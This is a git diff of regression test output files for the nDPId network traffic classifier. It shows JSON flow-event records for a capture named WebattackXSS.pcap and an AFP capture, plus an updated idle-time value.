+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00576{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":9374,"packets-processed":9374,"total-skipped-flows":0,"total-l4-data-len":4091888,"total-not-detected-flows":0,"total-guessed-flows":639,"total-detected-flows":22,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":661,"total-idle-flows":661,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3970,"global_ts_msec":1499348099366} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9374/9374 diff --git a/test/results/afp.pcap.out b/test/results/afp.pcap.out index bed31ae62..51c1ca3a7 100644 --- a/test/results/afp.pcap.out +++ b/test/results/afp.pcap.out @@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"afp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643275951277} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1643275951277,"pkt":"ABxCVgfWYPgdrn1ECABFAABKAABAAEAGgpnAqBs5wKgbi\/3bAiR+nkVXU19RioAYCHEmJgAAAQEICtTtV\/gAQrf\/AAIixgAAAAAAAAAGAAAAABEAAAIOHA=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAAA038RAAEAGourAqBuLwKgbOQIk\/dtTX1GKfp5FbYAQVeK4OwAAAQEICgBCwzzU7Vf4"} -00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAABm38VAAEAGorfAqBuLwKgbOQIk\/dtTX1GKfp5FbYAYVeK4bQAAAQEICgBCwzzU7Vf4AQIixgAAAAAAAAAiAAAAAA4cx5MnnCmFIy+AAAAAAAAACVyxcAAAAAALpMeAAAAAEAA="} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1643275951277,"pkt":"ABxCVgfWYPgdrn1ECABFAABKAABAAEAGgpnAqBs5wKgbi\/3bAiR+nkVXU19RioAYCHEmJgAAAQEICtTtV\/gAQrf\/AAIixgAAAAAAAAAGAAAAABEAAAIOHA=="} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAAA038RAAEAGourAqBuLwKgbOQIk\/dtTX1GKfp5FbYAQVeK4OwAAAQEICgBCwzzU7Vf4"} 